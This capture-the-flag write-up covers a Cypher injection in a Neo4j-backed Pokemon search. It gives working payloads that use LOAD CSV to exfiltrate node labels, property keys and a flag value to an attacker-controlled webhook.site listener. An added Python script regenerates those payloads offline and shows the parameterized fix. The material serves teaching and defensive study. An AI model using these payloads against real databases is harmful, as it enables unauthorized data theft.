Tags: web injection neo4j 

A single comma causes an error, so there is an injection. It isn't SQL though: the returned error message points to a Neo4j database, so the injection is into a Cypher query. After some trial and error I concluded that the query looks roughly like this, with the user-supplied search term ({param} below) pasted into the query text inside the quotes of toLower('...') rather than bound as a real parameter:

MATCH (pokemon:Pokemon) WHERE pokemon.name =~ '.*' + toLower({param}) + '.*' RETURN pokemon

Sending this: ') RETURN pokemon// works perfectly. The ') closes the string literal and the toLower() call, RETURN pokemon completes the statement, and // comments out the rest of the original query. With toLower('') the regex collapses to '.*', so every Pokemon comes back.

Next, abuse LOAD CSV to leak information out-of-band. LOAD CSV FROM <url> makes the database server itself fetch the URL, so if a value from the graph is concatenated into the URL path, that value shows up in the request log of a listener we control (webhook.site here), one request per value. Whether or not the rest of the query then succeeds, the HTTP request has already reached the listener. Start with the node labels:

') CALL db.labels() YIELD name as label LOAD CSV FROM 'https://webhook.site/REDACTED/'+label AS y RETURN *//

This reveals two kinds of nodes in the graph: pokemon and flag. Now read the property names of the flag node the same way, one request per key:

') MATCH (f:flag) WITH KEYS(f) as keys UNWIND keys as key LOAD CSV FROM 'https://webhook.site/REDACTED/'+key AS y RETURN *//

This reveals a single property, flag, and the last payload sends its value to the webhook:

') MATCH (f:flag) WITH f.flag as ff LOAD CSV FROM 'https://webhook.site/REDACTED/'+ff AS y RETURN *//
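The following is an added example, not code from the challenge or from this writeup. It reproduces the injection mechanics offline: it builds the concatenated query as reconstructed above, generates the three LOAD CSV exfil payloads from one helper, shows which part of the resulting text Neo4j actually parses once the // comment marker kicks in, and puts the parameterized (safe) form beside the vulnerable one. It assumes the query shape reconstructed above, and COLLABORATOR is a placeholder for the redacted webhook.site listener; nothing here makes a network request.

```python
"""Cypher injection by string concatenation, plus the out-of-band LOAD CSV
exfiltration used above, reproduced offline so the mechanics can be checked
without a Neo4j instance.

Added example, not code from the challenge or the writeup. It assumes the
query shape reconstructed in the writeup (user input pasted into the quotes of
toLower('...')). COLLABORATOR is a placeholder for a request-logging listener
such as the redacted webhook.site URL; nothing here touches the network.
"""

# Placeholder listener URL (assumed; the real one in the writeup is redacted).
COLLABORATOR = "https://webhook.site/REDACTED"


def vulnerable_query(user_input: str) -> str:
    """Query text as the writeup reconstructs it: the search term is spliced
    straight into the Cypher string, inside toLower('...')."""
    return (
        "MATCH (pokemon:Pokemon) "
        "WHERE pokemon.name =~ '.*' + toLower('" + user_input + "') + '.*' "
        "RETURN pokemon"
    )


def safe_query() -> str:
    """Hardened form: the term is bound as a driver parameter ($param) and is
    never part of the query text, so quotes in it cannot alter the statement.
    With the official driver: session.run(safe_query(), param=user_input)."""
    return (
        "MATCH (pokemon:Pokemon) "
        "WHERE pokemon.name =~ '.*' + toLower($param) + '.*' "
        "RETURN pokemon"
    )


def oob_payload(cypher_fragment: str, leak_var: str) -> str:
    """Build the LOAD CSV exfil payload around any Cypher fragment that binds
    `leak_var`. The leading `')` closes the string literal and the toLower()
    call, each value of `leak_var` becomes one HTTP request path on the
    listener, and the trailing `//` comments out the rest of the original
    query."""
    return (
        f"') {cypher_fragment} "
        f"LOAD CSV FROM '{COLLABORATOR}/'+{leak_var} AS y RETURN *//"
    )


# The three stages of the writeup, generated by the same helper.
LEAK_LABELS = oob_payload("CALL db.labels() YIELD name AS label", "label")
LEAK_KEYS = oob_payload(
    "MATCH (f:flag) WITH keys(f) AS keys UNWIND keys AS key", "key"
)
LEAK_FLAG = oob_payload("MATCH (f:flag) WITH f.flag AS ff", "ff")


def effective_query(query: str) -> str:
    """Return the part of `query` Neo4j will actually parse: everything up to
    the first `//` that sits outside a quoted string literal. This is why the
    comment marker removes the trailing `') + '.*' RETURN pokemon` but leaves
    the `//` inside the https:// listener URL alone."""
    in_str = None  # quote character of the string literal we are inside, if any
    i = 0
    while i < len(query):
        c = query[i]
        if in_str:
            if c == "\\":  # backslash escape inside a literal
                i += 2
                continue
            if c == in_str:
                in_str = None
        elif c in ("'", '"'):
            in_str = c
        elif query.startswith("//", i):
            return query[:i].rstrip()
        i += 1
    return query


if __name__ == "__main__":
    stages = [("labels", LEAK_LABELS), ("keys", LEAK_KEYS), ("flag", LEAK_FLAG)]
    for name, payload in stages:
        print(f"[{name}] payload : {payload}")
        print(f"[{name}] executes: {effective_query(vulnerable_query(payload))}")
```

Running it prints, for each stage, the raw payload and the statement the server ends up executing; the executed text still begins with the application's own MATCH/WHERE (with an empty toLower('')), followed by the injected MATCH/WITH/LOAD CSV, and the original RETURN pokemon is gone. The fix is the parameterized form: once the term arrives via $param, a quote in the input is just a character in the regex and cannot close the literal.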